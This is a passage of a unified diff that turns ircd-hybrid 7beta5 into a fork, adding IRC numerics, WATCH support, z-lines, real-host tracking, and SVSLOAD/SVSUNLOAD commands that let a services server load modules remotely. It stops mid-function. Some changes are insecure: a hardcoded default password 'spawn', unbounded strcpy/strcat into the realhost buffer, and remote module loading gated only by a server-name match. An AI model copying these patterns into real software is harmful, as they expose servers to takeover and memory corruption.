diff -uNrd ircd-hybrid-7beta5/src/messages.tab hybrid7-bg/src/messages.tab
--- ircd-hybrid-7beta5/src/messages.tab	Mon Apr 30 11:32:53 2001
+++ hybrid7-bg/src/messages.tab	Wed Jul 24 09:10:05 2002
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: messages.tab,v 7.49 2001/04/30 15:32:53 jdc Exp $
+ *   $Id: messages.tab,v 1.15 2002/07/24 13:10:05 Administrator Exp $
  */
 
 static  char *  replies[] = {
@@ -247,10 +247,10 @@
 /* 224 */       (char *)NULL,
 /* 225 RPL_STATSDLINE*/         ":%s 225 %s %c %s %s",
 /* 226 RPL_STATSALINE*/         ":%s 226 %s %s",
-/* 227 */       (char *)NULL,
-/* 228 */       (char *)NULL,
-/* 229 */       (char *)NULL,
-/* 230 */       (char *)NULL,
+/* 227 RPL_STATSZLINE*/		":%s 227 %s Services %s",
+/* 228 RPL_EQUIVALENTS*/	":%s 228 %s Equiv %s/%s",
+/* 229 RPL_RELAYS*/             ":%s 229 %s Relay %s",
+/* 230 RPL_USERPARMS*/			":%s 230 %s Userpar %s %s",
 /* 231 */       (char *)NULL,
 /* 232 */       (char *)NULL,
 /* 233 */       (char *)NULL,
@@ -322,7 +322,7 @@
 /* 294 */       (char *)NULL,
 /* 295 */       (char *)NULL,
 /* 296 */       (char *)NULL,
-/* 298 */       (char *)NULL,
+/* 298 RPL_WHOISCYRILLIC, */    ":%s 298 %s %s :has cyrillic-encoded nickname", 
 /* 299 */       (char *)NULL,
 /* 300 RPL_NONE, */      (char *)NULL,
 /* 301 RPL_AWAY, */      ":%s 301 %s %s :%s",
@@ -344,16 +344,16 @@
 /* 317 RPL_WHOISIDLE, */        ":%s 317 %s %s %d %d :seconds idle, signon time",
 /* 318 RPL_ENDOFWHOIS, */       ":%s 318 %s %s :End of /WHOIS list.",
 /* 319 RPL_WHOISCHANNELS, */    ":%s 319 %s %s :%s",
-/* 320 */      (char *)NULL,
+/* 320 */       (char *)NULL,
 /* 321 RPL_LISTSTART, */        ":%s 321 %s Channel :Users  Name",
 /* 322 RPL_LIST, */             ":%s 322 %s %s %d :%s",
 /* 323 RPL_LISTEND, */          ":%s 323 %s :End of /LIST",
 /* 324 RPL_CHANNELMODEIS, */    ":%s 324 %s %s %s %s",
 /* 325 */       (char *)NULL,
-/* 326 */       (char *)NULL,
-/* 327 */       (char *)NULL,
+/* 326 RPL_WHOISSVSHINT, */     ":%s 326 %s %s :has identified for: %s",
+/* 327 RPL_WHOISREALHOST, */	":%s 327 %s %s :logged on %s from %s",
 /* 328 */       (char *)NULL,
-/* 329 RPL_CREATIONTIME, */      ":%s 329 %s %s %lu", 
+/* 329 RPL_CREATIONTIME, */     ":%s 329 %s %s %lu", 
 /* 330 */       (char *)NULL,
 /* 331 RPL_NOTOPIC, */          ":%s 331 %s %s :No topic is set.",
 /* 332 RPL_TOPIC, */            ":%s 332 %s %s :%s",
@@ -368,8 +368,8 @@
 /* 341 RPL_INVITING, */         ":%s 341 %s %s %s",
 /* 342 RPL_SUMMONING, */ (char *)NULL,
 /* 343 */       (char *)NULL,
-/* 344 */       (char *)NULL,
-/* 345 */       (char *)NULL,
+/* 344 RPL_SUBSTLIST */         ":%s 344 %s %s %s %s %lu",
+/* 345 RPL_ENDOFSUBSTLIST */    ":%s 345 %s %s :End of Channel Subst List",
 /* 346 RPL_INVEXLIST */         ":%s 346 %s %s %s %s %lu",       
 /* 347 RPL_ENDOFINVEXLIST */    ":%s 347 %s %s :End of Channel Invite List",
 /* 348 RPL_EXCEPTLIST */        ":%s 348 %s %s %s %s %lu",
@@ -478,7 +478,7 @@
 /* 449 */       (char *)NULL,
 /* 450 */       (char *)NULL,
 /* 451 ERR_NOTREGISTERED, */    ":%s 451 %s :You have not registered",
-/* 452 */       (char *)NULL,
+/* 452 ERR_NOREPEATING, */      ":%s 452 %s %s :No repeating allowed (+z)",
 /* 453 */       (char *)NULL,
 /* 454 */       (char *)NULL,
 /* 455 */       (char *)NULL,
@@ -494,9 +494,9 @@
 /* 465 ERR_YOUREBANNEDCREEP, */ ":%s 465 %s :You are banned from this server- %s",
 /* 466 ERR_YOUWILLBEBANNED, */  (char *)NULL,
 /* 467 ERR_KEYSET, */           ":%s 467 %s %s :Channel key already set",
-/* 468 */       (char *)NULL,
-/* 469 */       (char *)NULL,
-/* 470 */       (char *)NULL,
+/* 468 ERR_CANNOTSENDNOTREG, */ ":%s 468 %s %s :Cannot send to channel (+M)",
+/* 469 ERR_REGNICKSCHAN, */     ":%s 469 %s %s :Cannot join channel (+R)",
+/* 470 ERR_NOCYRNICKCHAN, */    ":%s 470 %s %s :Cannot join channel (+C)",
 /* 471 ERR_CHANNELISFULL, */    ":%s 471 %s %s :Cannot join channel (+l)",
 /* 472 ERR_UNKNOWNMODE  , */    ":%s 472 %s %c :is unknown mode char to me",
 /* 473 ERR_INVITEONLYCHAN, */   ":%s 473 %s %s :Cannot join channel (+i)",
@@ -514,8 +514,8 @@
 /* 484 ERR_RESTRICTED, */       ":%s 484 %s :You are restricted",
 /* 485 ERR_BANNEDNICK, */
        ":%s 485 %s :Can't change nick when banned or on a moderated channel (%s)",
-/* 486 */       (char *)NULL,
-/* 487 */       (char *)NULL,
+/* 486 ERR_CANTKICKSERVICES, */ ":%s 486 %s %s %s :Cannot kick services bots",
+/* 487 ERR_CANTDEOPSERVICES, */ ":%s 487 %s %s %s :Cannot de-op services bots",
 /* 488 */       (char *)NULL,
 /* 489 */       (char *)NULL,
 /* 490 */       (char *)NULL,
@@ -527,14 +527,117 @@
 /* 496 */       (char *)NULL,
 /* 497 */       (char *)NULL,
 /* 498 */       (char *)NULL,
-/* 499 */       (char *)NULL,
-/* 500 */       (char *)NULL,
+/* 499 ERR_REGACCEPTONLY, */    ":%s 499 %s %s :Accepts messages from registered nicks only",
+    /* 500 ERR_TOOMANYWATCH */	":%s 500 %s %s :Maximum size for WATCH-list is 128 entries",
 /* 501 ERR_UMODEUNKNOWNFLAG, */ ":%s 501 %s :Unknown MODE flag",
 /* 502 ERR_USERSDONTMATCH, */   ":%s 502 %s :Can't change mode for other users",
 /* 503 ERR_GHOSTEDCLIENT, */    ":%s 503 %s :Message could not be delivered to %s",
 /* 504 ERR_USERNOTONSERV, */    ":%s 504 %s %s :User is not on this server",
-/* 505 LAST ERR_LAST_ERR_MSG, */        ":%s 505 %s :Last Error Message",
-                (char *)NULL
+/* 505 */       (char *)NULL,
+    /* 506 */	                NULL,
+    /* 507 */	                NULL,
+    /* 508 */	                NULL,
+    /* 509 */	                NULL,
+    /* 510 */	                NULL,
+    /* 511 */	                NULL,
+    /* 512 */	                NULL,
+    /* 513 */	                NULL,
+    /* 514 */	                NULL,
+    /* 515 */	                NULL,
+    /* 516 */	                NULL,
+    /* 517 */	                NULL,
+    /* 518 */	                NULL,
+    /* 519 */	                NULL,
+    /* 520 */	                NULL,
+    /* 521 */	                NULL,
+    /* 522 */	                NULL,
+    /* 523 */	                NULL,
+    /* 524 */	                NULL,
+    /* 525 */	                NULL,
+    /* 526 */	                NULL,
+    /* 527 */	                NULL,
+    /* 528 */	                NULL,
+    /* 529 */	                NULL,
+    /* 530 */	                NULL,
+    /* 531 */	                NULL,
+    /* 532 */	                NULL,
+    /* 533 */	                NULL,
+    /* 534 */	                NULL,
+    /* 535 */	                NULL,
+    /* 536 */	                NULL,
+    /* 537 */	                NULL,
+    /* 538 */	                NULL,
+    /* 539 */	                NULL,
+    /* 540 */	                NULL,
+    /* 541 */	                NULL,
+    /* 542 */	                NULL,
+    /* 543 */	                NULL,
+    /* 544 */	                NULL,
+    /* 545 */	                NULL,
+    /* 546 */	                NULL,
+    /* 547 */	                NULL,
+    /* 548 */	                NULL,
+    /* 549 */	                NULL,
+    /* 550 */	                NULL,
+    /* 551 */	                NULL,
+    /* 552 */	                NULL,
+    /* 553 */	                NULL,
+    /* 554 */	                NULL,
+    /* 555 */	                NULL,
+    /* 556 */	                NULL,
+    /* 557 */	                NULL,
+    /* 558 */	                NULL,
+    /* 559 */	                NULL,
+    /* 560 */	                NULL,
+    /* 561 */	                NULL,
+    /* 562 */	                NULL,
+    /* 563 */	                NULL,
+    /* 564 */	                NULL,
+    /* 565 */	                NULL,
+    /* 566 */	                NULL,
+    /* 567 */	                NULL,
+    /* 568 */	                NULL,
+    /* 569 */	                NULL,
+    /* 570 */	                NULL,
+    /* 571 */	                NULL,
+    /* 572 */	                NULL,
+    /* 573 */	                NULL,
+    /* 574 */	                NULL,
+    /* 575 */	                NULL,
+    /* 576 */	                NULL,
+    /* 577 */	                NULL,
+    /* 578 */	                NULL,
+    /* 579 */	                NULL,
+    /* 580 */	                NULL,
+    /* 581 */	                NULL,
+    /* 582 */	                NULL,
+    /* 583 */	                NULL,
+    /* 584 */	                NULL,
+    /* 585 */	                NULL,
+    /* 586 */	                NULL,
+    /* 587 */	                NULL,
+    /* 588 */	                NULL,
+    /* 589 */	                NULL,
+    /* 590 */	                NULL,
+    /* 591 */	                NULL,
+    /* 592 */	                NULL,
+    /* 593 */	                NULL,
+    /* 594 */	                NULL,
+    /* 595 */	                NULL,
+    /* 596 */	                NULL,
+    /* 597 */	                NULL,
+    /* 598 */	                NULL,
+    /* 599 */	                NULL,
+    /* 600 RPL_LOGON */		":%s 600 %s %s %s %s %d :logged online",
+    /* 601 RPL_LOGOFF */	":%s 601 %s %s %s %s %d :logged offline",
+    /* 602 RPL_WATCHOFF */	":%s 602 %s %s %s %s %d :stopped watching",
+    /* 603 RPL_WATCHSTAT */ ":%s 603 %s :You have %d and are on %d WATCH entries",
+    /* 604 RPL_NOWON */		":%s 604 %s %s %s %s %d :is online",
+    /* 605 RPL_NOWOFF */	":%s 605 %s %s %s %s %d :is offline",
+    /* 606 RPL_WATCHLIST */	":%s 606 %s :%s",
+    /* 607 RPL_ENDOFWATCHLIST */	":%s 607 %s :End of WATCH %c",
+/* 608 LAST ERR_LAST_ERR_MSG, */    ":%s 608 %s :Last Error Message",
+				(char *)NULL
 };
 
 
diff -uNrd ircd-hybrid-7beta5/src/modules-dld.c hybrid7-bg/src/modules-dld.c
--- ircd-hybrid-7beta5/src/modules-dld.c	Mon Mar  5 21:23:01 2001
+++ hybrid7-bg/src/modules-dld.c	Sat Jun 16 21:27:38 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: modules-dld.c,v 1.4 2001/03/06 02:23:01 androsyn Exp $
+ * $Id: modules-dld.c,v 1.2 2001/06/17 01:27:38 demond Exp $
  *
  * This is based on modules.c, but for OSes like HP-UX which use shl_open
  * instead of dlopen
@@ -193,7 +193,7 @@
   if(shl_findsym(modlist[modindex]->address, "_moddeinit", TYPE_UNDEFINED, &deinitfunc) == 0)
     deinitfunc ();
   else
-    if(shl_findsym(modlist[modindex]->address, "__moddeinit, TYPE_UNDEFINED. &deinitfunc) == 0)
+    if(shl_findsym(modlist[modindex]->address, "__moddeinit", TYPE_UNDEFINED. &deinitfunc) == 0)
     	deinitfunc ();	
 
   shl_unload(modlist[modindex]->address);
diff -uNrd ircd-hybrid-7beta5/src/modules.c hybrid7-bg/src/modules.c
--- ircd-hybrid-7beta5/src/modules.c	Wed Apr  4 12:17:44 2001
+++ hybrid7-bg/src/modules.c	Wed Jul 24 15:04:31 2002
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: modules.c,v 7.59 2001/04/04 16:17:44 androsyn Exp $
+ * $Id: modules.c,v 1.6 2002/07/24 19:04:31 Administrator Exp $
  */
 #include "config.h"
 
@@ -36,6 +36,8 @@
 
 #include "modules.h"
 #include "s_log.h"
+#include "s_conf.h"
+#include "s_serv.h"
 #include "ircd.h"
 #include "client.h"
 #include "send.h"
@@ -72,6 +74,8 @@
 static void mo_modreload(struct Client*, struct Client*, int, char**);
 static void mo_modunload(struct Client*, struct Client*, int, char**);
 static void mo_modrestart(struct Client*, struct Client*, int, char**);
+static void ms_svsload(struct Client*, struct Client*, int, char**);
+static void ms_svsunload(struct Client*, struct Client*, int, char**);
 
 struct Message modload_msgtab = {
  "MODLOAD", 0, 2, 0, MFLG_SLOW, 0,
@@ -88,6 +92,16 @@
   {m_unregistered, m_not_oper, m_ignore, mo_modreload}
 };
 
+struct Message svsload_msgtab = {
+  "SVSLOAD", 0, 2, 0, MFLG_SLOW, 0,
+  {m_unregistered, m_ignore, ms_svsload, m_ignore}
+};
+
+struct Message svsunload_msgtab = {
+  "SVSUNLOAD", 0, 2, 0, MFLG_SLOW, 0,
+  {m_unregistered, m_ignore, ms_svsunload, m_ignore}
+};
+
 struct Message modlist_msgtab = {
  "MODLIST", 0, 1, 0, MFLG_SLOW, 0,
   {m_unregistered, m_not_oper, m_ignore, mo_modlist}
@@ -103,7 +117,9 @@
 {
 	mod_add_cmd(&modload_msgtab);
 	mod_add_cmd(&modunload_msgtab);
-        mod_add_cmd(&modreload_msgtab);
+    mod_add_cmd(&modreload_msgtab);
+    mod_add_cmd(&svsload_msgtab);
+    mod_add_cmd(&svsunload_msgtab);
 	mod_add_cmd(&modlist_msgtab);
 	mod_add_cmd(&modrestart_msgtab);
 }
@@ -545,6 +561,45 @@
       modnum, num_mods);
 }
 
+static void
+ms_svsload(struct Client *client_p, struct Client *source_p, int parc, char **parv)
+{
+	char *m_bn;
+
+  if (parc < 3)
+    return;
+
+  if (hunt_server(client_p, source_p, ":%s SVSLOAD %s :%s", 
+		  1, parc, parv) != HUNTED_ISME)
+    return;
+
+  if (!find_z_conf(parv[0]))
+    return;
+
+	m_bn = irc_basename(parv[2]);
+
+	if (findmodule_byname(m_bn) == -1)
+		load_a_module(parv[2], 0);
+	  
+	MyFree(m_bn);
+}
+
+static void
+ms_svsunload(struct Client *client_p, struct Client *source_p, int parc, char **parv)
+{
+  if (parc < 3)
+    return;
+
+  if (hunt_server(client_p, source_p, ":%s SVSUNLOAD %s :%s", 
+		  1, parc, parv) != HUNTED_ISME)
+    return;
+
+  if (!find_z_conf(parv[0]))
+    return;
+
+	unload_one_module(parv[2], 0);
+}
+
 #else /* STATIC_MODULES */
 
 void
@@ -561,6 +616,7 @@
 	mod_add_cmd(&cjoin_msgtab);
 	mod_add_cmd(&client_msgtab);
 	mod_add_cmd(&close_msgtab);
+	mod_add_cmd(&conf_msgtab);
 	mod_add_cmd(&connect_msgtab);
 	mod_add_cmd(&die_msgtab);
 	mod_add_cmd(&dmem_msgtab);
@@ -606,6 +662,8 @@
 	mod_add_cmd(&squit_msgtab);
 	mod_add_cmd(&stats_msgtab);
 	mod_add_cmd(&svinfo_msgtab);
+	mod_add_cmd(&svsnick_msgtab);
+	mod_add_cmd(&svshint_msgtab);
 	mod_add_cmd(&testline_msgtab);
 	mod_add_cmd(&time_msgtab);
 	mod_add_cmd(&topic_msgtab);
@@ -618,6 +676,7 @@
 	mod_add_cmd(&users_msgtab);
 	mod_add_cmd(&version_msgtab);
 	mod_add_cmd(&wallops_msgtab);
+	mod_add_cmd(&watch_msgtab);
 	mod_add_cmd(&who_msgtab);
 	mod_add_cmd(&whois_msgtab);
 	mod_add_cmd(&whowas_msgtab);
diff -uNrd ircd-hybrid-7beta5/src/motd.c hybrid7-bg/src/motd.c
--- ircd-hybrid-7beta5/src/motd.c	Mon Mar  5 21:23:02 2001
+++ hybrid7-bg/src/motd.c	Tue Jun  5 12:35:46 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: motd.c,v 7.15 2001/03/06 02:23:02 androsyn Exp $
+ *   $Id: motd.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <sys/types.h>
diff -uNrd ircd-hybrid-7beta5/src/numeric.c hybrid7-bg/src/numeric.c
--- ircd-hybrid-7beta5/src/numeric.c	Sat Jan 20 05:57:40 2001
+++ hybrid7-bg/src/numeric.c	Tue Jun  5 12:35:46 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: numeric.c,v 7.15 2001/01/20 10:57:40 toot Exp $
+ *   $Id: numeric.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <sys/types.h>
diff -uNrd ircd-hybrid-7beta5/src/oldparse.c hybrid7-bg/src/oldparse.c
--- ircd-hybrid-7beta5/src/oldparse.c	Tue Apr 17 18:36:07 2001
+++ hybrid7-bg/src/oldparse.c	Tue Jun  5 12:35:46 2001
@@ -19,7 +19,7 @@
  *
  *  (C) 1988 University of Oulu,Computing Center and Jarkko Oikarinen"
  *
- *  $Id: oldparse.c,v 1.25 2001/04/17 22:36:07 fl_ Exp $
+ *  $Id: oldparse.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <sys/types.h>
diff -uNrd ircd-hybrid-7beta5/src/packet.c hybrid7-bg/src/packet.c
--- ircd-hybrid-7beta5/src/packet.c	Sat May 12 22:33:09 2001
+++ hybrid7-bg/src/packet.c	Tue Jun  5 12:35:46 2001
@@ -18,7 +18,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- *   $Id: packet.c,v 7.48 2001/05/13 02:33:09 a1kmm Exp $
+ *   $Id: packet.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */ 
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/src/parse.c hybrid7-bg/src/parse.c
--- ircd-hybrid-7beta5/src/parse.c	Fri Apr 13 18:39:51 2001
+++ hybrid7-bg/src/parse.c	Tue Jun  5 12:35:46 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: parse.c,v 7.99 2001/04/13 22:39:51 davidt Exp $
+ *   $Id: parse.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <assert.h>
diff -uNrd ircd-hybrid-7beta5/src/patricia.c hybrid7-bg/src/patricia.c
--- ircd-hybrid-7beta5/src/patricia.c	Mon Apr  9 11:09:31 2001
+++ hybrid7-bg/src/patricia.c	Tue Jun  5 12:35:46 2001
@@ -1,7 +1,7 @@
 /*
  * Yanked out of Net::Patricia by Aaron Sethman <androsyn@ratbox.org>
  *
- * $Id: patricia.c,v 7.9 2001/04/09 15:09:31 davidt Exp $
+ * $Id: patricia.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  * Dave Plonka <plonka@doit.wisc.edu>
  *
  * This product includes software developed by the University of Michigan,
diff -uNrd ircd-hybrid-7beta5/src/restart.c hybrid7-bg/src/restart.c
--- ircd-hybrid-7beta5/src/restart.c	Thu Jan 18 12:32:23 2001
+++ hybrid7-bg/src/restart.c	Tue Jun  5 12:35:46 2001
@@ -1,7 +1,7 @@
 /*
  * restart.c
  *
- * $Id: restart.c,v 7.12 2001/01/18 17:32:23 ejb Exp $
+ * $Id: restart.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "tools.h"
 #include "restart.h"
diff -uNrd ircd-hybrid-7beta5/src/rsa.c hybrid7-bg/src/rsa.c
--- ircd-hybrid-7beta5/src/rsa.c	Fri Apr 13 18:39:52 2001
+++ hybrid7-bg/src/rsa.c	Tue Jun  5 12:35:46 2001
@@ -19,7 +19,7 @@
  *
  *
  *
- * $Id: rsa.c,v 7.9 2001/04/13 22:39:52 davidt Exp $
+ * $Id: rsa.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <assert.h>
diff -uNrd ircd-hybrid-7beta5/src/s_auth.c hybrid7-bg/src/s_auth.c
--- ircd-hybrid-7beta5/src/s_auth.c	Tue May 15 18:43:04 2001
+++ hybrid7-bg/src/s_auth.c	Tue Jun  5 12:35:46 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: s_auth.c,v 7.65 2001/05/15 22:43:04 leeh Exp $
+ *   $Id: s_auth.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  *
  * Changes:
  *   July 6, 1999 - Rewrote most of the code here. When a client connects
diff -uNrd ircd-hybrid-7beta5/src/s_bsd.c hybrid7-bg/src/s_bsd.c
--- ircd-hybrid-7beta5/src/s_bsd.c	Wed May  2 14:35:07 2001
+++ hybrid7-bg/src/s_bsd.c	Tue Jun  5 12:35:46 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_bsd.c,v 7.125 2001/05/02 18:35:07 androsyn Exp $
+ *  $Id: s_bsd.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "config.h"
 #include "fdlist.h"
diff -uNrd ircd-hybrid-7beta5/src/s_bsd_devpoll.c hybrid7-bg/src/s_bsd_devpoll.c
--- ircd-hybrid-7beta5/src/s_bsd_devpoll.c	Wed May  9 04:08:26 2001
+++ hybrid7-bg/src/s_bsd_devpoll.c	Tue Jun  5 12:35:46 2001
@@ -23,7 +23,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_bsd_devpoll.c,v 7.4 2001/05/09 08:08:26 a1kmm Exp $
+ *  $Id: s_bsd_devpoll.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "config.h"
 #ifdef USE_DEVPOLL
diff -uNrd ircd-hybrid-7beta5/src/s_bsd_kqueue.c hybrid7-bg/src/s_bsd_kqueue.c
--- ircd-hybrid-7beta5/src/s_bsd_kqueue.c	Wed May  9 04:08:27 2001
+++ hybrid7-bg/src/s_bsd_kqueue.c	Tue Jun  5 12:35:46 2001
@@ -23,7 +23,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_bsd_kqueue.c,v 1.14 2001/05/09 08:08:27 a1kmm Exp $
+ *  $Id: s_bsd_kqueue.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "config.h"
 #ifdef USE_KQUEUE
diff -uNrd ircd-hybrid-7beta5/src/s_bsd_poll.c hybrid7-bg/src/s_bsd_poll.c
--- ircd-hybrid-7beta5/src/s_bsd_poll.c	Wed May  9 04:20:42 2001
+++ hybrid7-bg/src/s_bsd_poll.c	Tue Jun  5 12:35:46 2001
@@ -23,7 +23,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_bsd_poll.c,v 7.42 2001/05/09 08:20:42 a1kmm Exp $
+ *  $Id: s_bsd_poll.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "config.h"
 #ifdef USE_POLL
diff -uNrd ircd-hybrid-7beta5/src/s_bsd_select.c hybrid7-bg/src/s_bsd_select.c
--- ircd-hybrid-7beta5/src/s_bsd_select.c	Wed May  9 04:08:27 2001
+++ hybrid7-bg/src/s_bsd_select.c	Tue Jun  5 12:35:46 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_bsd_select.c,v 7.17 2001/05/09 08:08:27 a1kmm Exp $
+ *  $Id: s_bsd_select.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "config.h"
 #ifdef USE_SELECT
diff -uNrd ircd-hybrid-7beta5/src/s_conf.c hybrid7-bg/src/s_conf.c
--- ircd-hybrid-7beta5/src/s_conf.c	Tue May 15 14:17:08 2001
+++ hybrid7-bg/src/s_conf.c	Fri Jul 19 00:23:20 2002
@@ -19,7 +19,7 @@
  *
  *  (C) 1988 University of Oulu,Computing Center and Jarkko Oikarinen"
  *
- *  $Id: s_conf.c,v 7.214 2001/05/15 18:17:08 db Exp $
+ *  $Id: s_conf.c,v 1.15 2002/07/19 04:23:20 Administrator Exp $
  */
 
 #include <sys/types.h>
@@ -61,6 +61,7 @@
 #include "s_debug.h"
 #include "fileio.h"
 #include "memory.h"
+#include "s_misc.h"
 
 
 extern int yyparse(); /* defined in y.tab.c */
@@ -131,6 +132,22 @@
 /* conf uline link list root */
 struct ConfItem        *u_conf = ((struct ConfItem *)NULL);
 
+/* conf zline link list root */
+struct ConfItem        *z_conf = ((struct ConfItem *)NULL);
+
+struct Equiv {
+  char *nick;
+  char *target;
+  struct Equiv *next;
+};
+
+static struct Equiv *equivs = NULL;
+static struct Equiv *userparms = NULL;
+
+#define MAXRELAYS 64
+static char *relays[MAXRELAYS];
+static int relaynum = 0;
+
 /*
  * conf_dns_callback - called when resolver query finishes
  * if the query resulted in a successful search, hp will contain
@@ -482,7 +499,8 @@
     {
       aconf = find_address_conf(client_p->host,client_p->username,
 				&client_p->localClient->ip,
-				client_p->localClient->aftype);
+				client_p->localClient->aftype,
+				client_p->localClient->passwd);
     }
   else
     {
@@ -491,7 +509,8 @@
       non_ident[USERLEN] = '\0';
       aconf = find_address_conf(client_p->host,non_ident,
 				&client_p->localClient->ip,
-				client_p->localClient->aftype);
+				client_p->localClient->aftype,
+				client_p->localClient->passwd);
     }
 
   if (aconf != NULL)
@@ -529,13 +548,31 @@
 	  /* Thanks for spoof idea amm */
 	  if (IsConfDoSpoofIp(aconf))
 	    {
+	      char *p = strchr(aconf->name, '@');
+
 	      if (IsConfSpoofNotice(aconf))
 		{
 		  sendto_realops_flags(FLAGS_ADMIN,
 				       "%s spoofing: %s as %s", client_p->name,
 				       client_p->host, aconf->name);
 		}
-	      strncpy_irc(client_p->host, aconf->name, HOSTLEN);
+	      if (p) 
+		{
+		  int len = p - aconf->name;
+		  if (len > USERLEN) 
+		    len = USERLEN;
+
+		  strcpy(client_p->realhost, client_p->username);
+		  strcat(client_p->realhost, "@");
+		  strncat(client_p->realhost, client_p->host, HOSTLEN - strlen(client_p->username) - 1);
+		  strncpy_irc(client_p->username, aconf->name, len);
+		  if (len)
+		    client_p->username[len] = '\0';
+		}
+	      else
+		strcpy(client_p->realhost, client_p->host);
+	      strncpy_irc(client_p->host, p? p+1 : aconf->name, HOSTLEN);
+
 	      SetIPSpoof(client_p);
 	      SetIPHidden(client_p);
 	    }
@@ -1278,6 +1315,25 @@
   return NO;
 }
 
+int find_z_conf(char *server)
+{
+  struct ConfItem *aconf;
+
+  for (aconf = z_conf; aconf; aconf = aconf->next)
+    {
+      if (BadPtr(aconf->name))
+          continue;
+
+      if(match(aconf->name,server))
+	{
+	  if (BadPtr(aconf->user) || BadPtr(aconf->host))
+	    return YES;
+
+	}
+    }
+  return NO;
+}
+
 /*
  * find_q_conf
  *
@@ -1331,6 +1387,25 @@
     }
 }
 
+void report_zlines(struct Client *source_p)
+{
+  struct ConfItem *aconf;
+  char *host;
+  char *user;
+  char *pass;
+  char *name;
+  char *classname;
+  int  port;
+
+  for (aconf = z_conf; aconf; aconf = aconf->next)
+    {
+      get_printable_conf(aconf, &name, &host, &pass, &user, &port,&classname);
+          
+      sendto_one(source_p, form_str(RPL_STATSZLINE),
+		 me.name, source_p->name, name);
+    }
+}
+
 /*
  * clear_special_conf
  * 
@@ -1367,7 +1442,9 @@
   }
 
   close_listeners();
-  restart_resolver();
+
+  /*  restart_resolver();   oh well.. this coredumps if theres no /etc/resolv.conf*/
+
   read_conf_files(NO);
 
   if (ServerInfo.description != NULL)
@@ -1438,6 +1515,28 @@
 
   if (!ConfigFileEntry.links_delay)
         ConfigFileEntry.links_delay = LINKS_DELAY_DEFAULT;
+
+  if (!ConfigFileEntry.grace_time)
+        ConfigFileEntry.grace_time = GRACE_TIME_DEFAULT;
+
+  if (!ConfigFileEntry.repeat_grace)
+        ConfigFileEntry.repeat_grace = REPGRACEDEF;
+
+  if (!ConfigFileEntry.spam_wait)
+        ConfigFileEntry.spam_wait = SPAM_WAIT_DEFAULT;
+
+  if (!ConfigFileEntry.drone_rate_max)
+        ConfigFileEntry.drone_rate_max = DRONE_RMAX_DEF;
+
+  if (!ConfigFileEntry.drone_rate_period)
+        ConfigFileEntry.drone_rate_period = DRONE_RPERIOD_DEF;
+
+  if (!ConfigFileEntry.drone_kline_time)
+        ConfigFileEntry.drone_kline_time = DRONE_KTIME_DEF;
+
+  if (!ConfigFileEntry.spawn_pass[0])
+	  strcpy(ConfigFileEntry.spawn_pass, "spawn");
+
   GlobalSetOptions.hide_server = ConfigFileEntry.hide_server;
 }
 
@@ -1570,7 +1669,7 @@
   assert(0 != client_p);
   aconf = find_address_conf(client_p->host, client_p->username,
 			    &client_p->localClient->ip,
-			    client_p->localClient->aftype);
+			    client_p->localClient->aftype, NULL);
   if (aconf == NULL)
     return aconf;
   if(aconf->status & CONF_KILL)
@@ -1958,8 +2057,187 @@
     clear_special_conf(&x_conf);
     clear_special_conf(&u_conf);
     clear_special_conf(&q_conf);
+    clear_special_conf(&z_conf);
+
+    {
+      int i;
+      struct Equiv *eitem;
+
+      if (equivs) do {
+	eitem = equivs;
+	equivs = equivs->next;
+
+	MyFree(eitem->nick);
+	MyFree(eitem->target);
+	MyFree(eitem);
+
+      } while (equivs);
+
+      if (userparms) do {
+	eitem = userparms;
+	userparms = userparms->next;
+
+	MyFree(eitem->nick);
